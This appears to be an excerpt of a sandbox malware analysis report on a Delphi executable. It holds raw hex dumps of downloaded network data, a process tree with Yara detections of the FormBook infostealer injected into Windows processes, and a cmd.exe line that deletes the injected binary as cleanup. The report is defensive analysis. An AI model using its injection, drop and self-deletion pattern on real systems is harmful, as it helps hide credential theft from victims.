26 58 d0 95 b3 54 dd e6 0b 1f c5 39 82 0a 92 3d 97 8c 44 82 28 42 f7 b7 5a a0 71 7f a0 77 8d c4 08 f0 44 8a 3e
                                                                                              Data Ascii: ^\]HN+m=d"QY/CfH]/tiye_$VUB_#~XCmyU7FP0S5#oqPSXQ,8~{^'p4f)3T{mD*)Nr%vl1Z:V]>Ko~f`-moq|jC(&XT9=D(BZqwD>
                                                                                              2022-01-28 18:02:56 UTC1435INData Raw: ae 90 3a 2a 0a cb e4 43 c3 d8 4f d9 b8 b4 aa 8d 14 3a fb a9 2e be 47 5a 90 18 4e a4 81 e3 bc b0 63 01 7e db 0d 35 e2 38 2f 63 55 0a b6 cc a0 9e 05 a8 0e 00 24 c6 80 cc 31 50 e1 9e 71 3a 6f 76 c8 86 14 cb e6 63 51 58 e4 68 dc 90 28 82 1b a1 f9 c5 42 98 e9 fa 7e f3 4f 6e a5 03 63 5a c3 51 a8 94 57 15 f7 b0 c6 be 3b 0c 04 2b 23 eb ec 12 ce 6e be 36 ef 8a e7 24 70 25 93 9d 0a 81 67 e1 61 aa 6e 53 d9 50 20 66 2c c5 1e 28 5d 45 ce b3 7c 32 98 e1 d6 c1 7a 19 e8 6a a1 c2 4f 40 80 24 26 5e d0 79 da 24 d4 7f ea 66 b4 3a 16 d7 db d0 a9 2e 96 de 5e 35 6d 3c a9 87 fe 8a 4b dc 94 58 be c1 c7 b3 fe e1 d6 f3 45 45 0d 7d 9d e7 15 d0 47 66 19 a5 4b 34 a2 ff a3 f7 3d d0 31 a5 8e 00 49 13 01 16 15 7b 1b 60 a6 54 36 60 80 93 da 14 0d 21 3d b0 b4 e8 87 b9 ed bc f7 ea 66 81 ef
                                                                                              Data Ascii: :*CO:.GZNc~58/cU$1Pq:ovcQXh(B~OncZQW;+#n6$p%ganSP f,(]E|2zjO@$&^y$f:.^5m<KXEE}GfK4=1I{`T6`!=f
                                                                                              2022-01-28 18:02:56 UTC1451INData Raw: 4d 55 36 8e 30 55 37 25 02 1e d7 6c 4d ac 18 e6 d4 14 b7 a7 82 d5 80 50 bf ae e3 a1 fb bd f9 24 c7 b3 9f 79 1f 54 4c 77 39 7b 13 73 7c 6e da e4 5d 48 96 65 e7 52 51 c4 67 e9 3f 02 1e c0 79 07 e6 d4 03 17 d5 97 98 60 d1 69 d1 a7 3a 8f 34 89 0c 77 00 8b 3e 84 c6 c8 58 35 1b 5e b9 6c 19 e4 27 c1 93 6d 8b 3e 92 43 85 3c 89 43 e1 92 c6 53 ce 12 7e 6e 1e 50 ab 11 d7 3c 89 43 e1 92 de 9b 15 6e 1f a3 6b e5 57 c4 a7 8e a0 0f 80 26 11 3f 02 1e c1 43 85 3c 89 43 e1 9a f2 c2 31 26 49 8a d6 79 90 4f ea 8d 39 11 6e f2 c4 5e 32 a3 17 97 75 03 9c 93 a1 4a 72 78 12 08 ac 2d 30 a8 62 d7 09 fe 97 1f 43 f4 da 87 49 e8 44 43 e0 63 58 bc 87 0e 00 24 d0 0e 72 8d 39 11 6f 81 32 d7 7b 67 10 da e4 5d 48 97 fc db 71 81 4f de 9b 67 9b 15 79 66 77 06 14 f0 30 a2 94 20 2c 4f 22 8b 3e
                                                                                              Data Ascii: MU60U7%lMP$yTLw9{s|n]HeRQg?y`i:4w>X5^l'm>C<CS~nP<CnkW&?C<C1&IyO9n^2uJrx-0bCIDCcX$r9o2{g]HqOgyfw0 ,O">
                                                                                              2022-01-28 18:02:56 UTC1467INData Raw: 73 3b 0c 05 9b 0e 72 8d 39 11 74 e6 be 4f d9 76 bf 49 ff 93 d7 87 b2 1d 59 bf b5 cd e7 20 d1 8a cd b6 3a fb 1e d7 30 72 e8 48 96 5c 2c f4 b0 5f a3 22 be 49 e8 cf 9c b4 3f 76 f4 b0 14 34 89 c4 d1 74 ca 5b ba 46 7c c2 43 85 4e 5b b6 7b 0d f6 ab ec 8e 19 74 7e 1d a7 ed 05 97 1f 58 6a 61 d8 f8 a6 75 58 2b 41 fd 19 28 25 52 d6 03 61 d9 31 26 c2 3d 28 cf e2 df 66 11 4b 89 37 16 eb 03 1e c0 b1 20 2f 28 fa a1 06 18 d5 f2 c4 2c b3 d4 34 f4 c4 2c b3 93 46 67 1c 21 b1 be 7c c8 ee c0 36 95 12 87 3b 0c 04 51 c5 be bc be 91 c4 bb 34 0b 38 01 0e 87 b3 3e 5f f1 38 94 ec 1f 43 52 d6 04 ff cf d6 fe 97 14 43 8d 4d de e9 06 21 58 c6 da 0e f7 6e 09 8c b7 7e 92 de e9 4d d5 37 7c 91 2f 2b 7e ff 03 1b a3 ff 17 2f 2b 35 10 4d ac 18 e6 d4 08 b4 3f 76 f4 b0 14 f9 33 a6 84 2e ae 23
                                                                                              Data Ascii: s;r9tOvIY :0rH\,_"I?v4t[F|CN[{t~XjauX+A(%Ra1&=(fK7 /(,4,Fg!|6;Q48>_8CRCM!Xn~M7|/+~/+5M?v3.#
                                                                                              2022-01-28 18:02:56 UTC1483INData Raw: 21 44 8a d6 79 90 4f 92 eb 48 6b 90 ce 60 5f af e2 de 6a 79 19 63 a5 f7 c0 21 c8 df 9b 6a 54 4c 60 2c 30 da 81 58 41 fc 1b 34 ea ca 1c d7 a8 63 22 31 db de ae 64 23 4b 64 51 a1 06 14 f1 b3 b2 2e ad e7 59 02 09 0b 7a 14 c3 e9 4d de e8 44 07 e0 e4 da f2 39 7b 13 73 7c ee 67 8c 3b f1 c6 6c 49 e8 cf 91 a0 fa d3 85 4e 5a af 88 b2 5a 3c 82 44 62 af 1f a9 22 8b 3e 84 d1 19 11 0a 0a 0a 0b 10 90 c5 a9 f1 33 5a 2b b2 a7 0b 0c 42 57 08 0f 7d 63 32 d1 f8 a6 79 79 5c 20 56 bd 58 9e d0 8a 3f a8 9f 4e 5b ba 4d 30 bf 1c 5b 40 99 c5 ef 3d 07 93 61 d0 79 6d 8b 35 52 46 f7 d4 fe e4 9d 10 fa a0 c3 dc 9c 93 2a b9 87 23 3e 84 d0 06 27 28 3a 72 02 bd f9 24 c7 a5 b3 aa 1d 59 bf b8 18 8c c8 22 cc 1c c1 a3 86 36 64 78 a8 74 f9 25 16 99 68 18 e6 d5 d7 11 0c 05 97 14 f7 3e 03 61 57
                                                                                              Data Ascii: !DyOHk`_jyc!jTL`,0XA4c"1d#KdQ.YzMD9{s|g;lINZZ<Db">3Z+BW}c2yy\ VX?N[M0[@=aym5RF*#>'(:r$Y"6dxt%h>aW
                                                                                              2022-01-28 18:02:56 UTC1499INData Raw: 37 09 b7 b1 ce 66 b7 f2 c2 0d 20 cb ee c0 36 68 b9 df 66 1d d9 16 fc 1b a0 73 2b 6b 6f cb 1d a3 ff 5b 48 1f ab 79 c2 36 23 38 6f 85 f4 89 44 cf e6 d4 03 9d 17 12 87 49 e8 38 8b 29 c5 dd 6f 39 65 57 7e 94 a7 f6 aa 68 72 8d 39 11 79 6a 28 c3 bd ca b6 6f f2 49 1f 69 34 65 0e 00 d3 f1 06 60 02 6a e4 60 59 bf b9 39 58 56 47 ed c2 75 60 aa 90 27 c0 68 e6 99 9d ea 34 f5 dc 9a 70 85 b3 cc f3 ba c6 27 3f 02 e9 cf ee 34 14 0f 8e 35 67 77 f1 c5 bd 56 ca 63 5a c3 51 24 45 8c 48 e1 61 59 3d 7b 50 22 df 12 5f 50 e9 3f 3e b8 ef d2 33 5d 4e 80 70 70 df 9d 64 c4 82 d5 77 06 28 c9 b2 96 51 08 84 d0 fe 4c eb 48 90 6a b8 3d dc 15 18 01 0f 7d 95 51 ef 49 15 23 b5 47 12 60 de 32 08 79 9a 43 4c 16 0c ab ec 32 d7 47 99 e4 97 e0 71 7e 75 50 22 c3 95 59 13 1c e0 41 5b 41 26 69 e2
                                                                                              Data Ascii: 7f 6hfs+ko[Hy6#8oDI8)o9eW~hr9yj(oIi4e`j`Y9XVGu`'h4p'?45gwVcZQ$EHaY={P"_P?>3]Nppdw(QLHj=}QI#G`2yCL2Gq~uP"YA[A&i
                                                                                              2022-01-28 18:02:56 UTC1514INData Raw: a1 fc 7b bc aa 6f 89 f9 56 47 ed 40 0f 6a 1c 66 6f aa 1b 81 2e 36 56 47 76 73 83 42 0f ea 60 12 39 11 78 f4 a4 69 39 1e 6d f9 03 e8 c2 45 5b 16 e4 e1 1d 4a 11 d2 34 3c 93 5e 96 03 88 d2 08 0f c8 2d 26 fe 97 1f f3 fa b6 af 1d a6 84 95 32 19 11 ff eb 59 6e 9e 61 dc 75 d1 2c 16 d4 cf 9f 1f 54 4c d4 ee d6 c2 31 26 c7 eb 5f a0 32 d1 0d 7d 73 8f a3 ee b6 cb 3c 2f 8e 88 0a 0a 0a a1 a0 9f 32 d7 68 b2 2e ad e7 f7 8d 2e 52 ae 9b eb 0d 02 1e d7 7b 21 58 fb 6a 13 73 da 8d 2e aa c5 dd 7b dd 1e 78 fc 26 b0 5f af ea d1 9d ee 3f 44 ec 29 4e c2 1e d7 84 a4 f9 de 17 e7 0c aa 60 97 6d 27 c0 c9 64 dc 79 92 39 e6 41 22 ba dd a3 01 3a 08 f0 aa 95 b2 f0 84 1c dc ee da ad f0 14 ff ae 16 34 e8 54 83 53 55 4e a4 6f 5e a5 56 78 23 6d ff 19 17 7f ef 4b f0 09 fa 97 d3 2c 1f 43 cc 6b
                                                                                              Data Ascii: {oVG@jfo.6VGvsB`9xi9mE[J4<^-&2Ynau,TL1&_2}s</2h..R{!Xjs.{x&_?D)N`m'dy9A":4TSUNo^Vx#mK,Ck
                                                                                              2022-01-28 18:02:56 UTC1530INData Raw: 7f a2 7c 1b a4 38 94 a7 f7 01 cb e8 cf 90 b0 0c 7f 2f d1 8a c1 b5 95 5f 96 a2 83 52 1a 9b 63 56 fb 6a ec 3a 70 62 53 3e bb b9 c8 22 80 1c cb 35 04 a3 75 d8 f8 a6 78 c7 de 9b ea 35 e5 ad 70 fb e1 9e c7 de 19 9c 6c e1 9e 9d 92 d2 08 0f 36 5c 20 7e 13 cf e4 75 54 f6 d9 95 b0 58 fb 68 ff a8 00 24 c7 f5 f2 a1 81 a2 7d a9 af e1 cb e8 3d 13 73 7c b4 98 8a 46 8a 3f 2d 6e 0a a0 fa 51 59 40 94 23 36 9a 3f 76 03 26 b6 8f 42 e1 ae 64 b8 cc e8 9f 9b 82 7f 62 e4 d9 cc 61 aa 6f 87 1a 9b 63 a5 fc 9d 47 97 69 96 a2 82 9a e2 a9 f1 38 95 56 3d 71 be f7 85 4e 5b bb b0 64 5d a6 0d 28 81 fc 1b a3 ec 72 c5 52 25 ba b9 37 16 31 26 c2 31 af f5 12 81 7f 29 96 cd a9 18 a9 cd 64 6c 32 51 9c af 11 37 2a 4c 2f 17 9e c1 88 31 69 aa 97 50 6a ea 85 72 05 d8 c4 d7 34 a2 7f 12 2b 21 ad 6c
                                                                                              Data Ascii: |8/_RcVj:pbS>"5ux5pl6\ ~uTXh$}=s|F?-nQY@#6?v&BdbaocGi8V=qN[d](rR%71&1)dl2Q7*L/1iPjr4+!l
                                                                                              2022-01-28 18:02:56 UTC1546INData Raw: b6 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 2f d4 92 c7 9b 61 27 af 6f 0b 3d 8c 2d ae f2 3b 92 05 2d c2 b6 af 29 e1 e6 2b f9 33 a6 86 07 a1 81 a7 3f a9 76 0b 4e c4 ab 13 ba e5 d0 f2 7f fa 26 3d ce a1 81 a7 6f 59 40 80 24 34 19 9c 02 d9 89 bc bf 46 8f cb 65 5f 50 a9 0e ff eb b7 32 5c c8 dd 93 d5 7f a2 7c 1a 1e 28 42 85 c9 60 bc 87 76 80 67 08 9f 86 40 ee 50 ea 70 f2 31 d9 bd 65 27 c0 fa b6 d7 84 1c ef ba b9 01 0a 8d c6 ee 5f 28 42 b3 7b e0 1b 97 b8 cc e8 06 a7 71 7e 78 88 39 ee 3f ed c5 56 d5 9f f4 4f 26 3d f8 59 40 80 24 38 6b 6e f6 54 b3 27 c0 c9 60 d2 f7 d6 01 5e cd 6a ec 3a 08 f0 29 25 2a 30 38 07 0b 0a 90 38 24 53 52 cf 1b f2 0c f4 37 e9 86 10 7d 9d dc f9 a3 fe 5b 89 c4 d3 4c cb 1d a6 b0 c0 b1 22 05 34 19
                                                                                              Data Ascii: ;0W;0W;0W;0W;0/a'o=-;-)+3?vN&=oY@$4Fe_P2\|(B`vg@Pp1e'_(B{q~x9?VO&=Y@$8knT'`^j:)%*088$SR7}[L"4
                                                                                              2022-01-28 18:02:56 UTC1562INData Raw: a7 f0 85 60 5b 8d 4f 40 90 ae 5a 0b f1 0a 7d 5a 4a cd aa 1b 62 8c 1d 60 59 bf b9 cb 12 e2 20 2e 52 c9 d8 0d 09 0b 7d 8d 8e b3 a6 94 b3 d8 f8 a5 88 d1 b3 ac 8e 3c 80 a1 09 f8 7d ce 12 c9 eb b0 d5 89 39 1e a3 e2 73 7c d9 02 e6 5e 1a ac a8 ed 6a 5e e8 56 91 a7 de a5 3e 1d 89 ce 3a c1 76 6d 70 b8 3f 9b 1c 10 dd 18 4f 75 88 79 1f 68 18 e6 d4 4c 77 91 80 af 1d e6 a6 45 56 7b 13 73 7c e6 f0 ac 56 33 d9 fd 3d 7d 9d ef c2 a9 b5 28 a9 d5 4c 9b 9f 8c 46 9c 8c 7e 18 6d 0c ff f9 cf 52 b9 dc ca d0 e9 59 98 e9 61 aa 4a 11 8b b2 a7 e0 98 04 af 12 7e c8 6c 18 98 04 e2 68 6c 97 b3 e7 26 fe 68 e7 bf 4d c8 dd 93 d5 ad a0 0f 87 a6 ae 8e b7 34 15 91 a8 8e 58 96 60 51 ec b1 e1 c4 8b 98 46 a3 27 5b 41 26 41 dd 91 f4 23 6c fe 68 e5 8c 0f 03 05 f3 ce c9 1c fa 7a 29 1c 2f 38 e8 30
                                                                                              Data Ascii: `[O@Z}ZJb`Y .R}<}9s|^j^V>:vmp?OuyhLwEV{s|V3=}(LF~mRYaJ~lhl&hM4X`QF'[A&A#lhz)/80


                                                                                              Click to jump to process

                                                                                              Target ID:2
                                                                                              Start time:19:02:05
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Noua lista de comenzi.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:755200 bytes
                                                                                              MD5 hash:C6C9905431F32998369BA3FCE5743A2B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low

                                                                                              Target ID:13
                                                                                              Start time:19:02:32
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\SysWOW64\DpiScaling.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\DpiScaling.exe
                                                                                              Imagebase:0x11b0000
                                                                                              File size:77312 bytes
                                                                                              MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              Target ID:14
                                                                                              Start time:19:02:35
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff720ea0000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              Target ID:15
                                                                                              Start time:19:02:42
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Contacts\Tdfgwnfyyv.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:755200 bytes
                                                                                              MD5 hash:C6C9905431F32998369BA3FCE5743A2B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              Target ID:16
                                                                                              Start time:19:02:50
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Contacts\Tdfgwnfyyv.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:755200 bytes
                                                                                              MD5 hash:C6C9905431F32998369BA3FCE5743A2B
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low

                                                                                              Target ID:20
                                                                                              Start time:19:03:14
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\SysWOW64\systray.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                              Imagebase:0x20000
                                                                                              File size:9728 bytes
                                                                                              MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              Target ID:22
                                                                                              Start time:19:03:19
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\SysWOW64\logagent.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\logagent.exe
                                                                                              Imagebase:0xdf0000
                                                                                              File size:86016 bytes
                                                                                              MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              Target ID:23
                                                                                              Start time:19:03:21
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/c del "C:\Windows\SysWOW64\DpiScaling.exe"
                                                                                              Imagebase:0xd80000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:24
                                                                                              Start time:19:03:23
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7f20f0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:25
                                                                                              Start time:19:03:28
                                                                                              Start date:28/01/2022
                                                                                              Path:C:\Windows\SysWOW64\logagent.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\logagent.exe
                                                                                              Imagebase:0xdf0000
                                                                                              File size:86016 bytes
                                                                                              MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
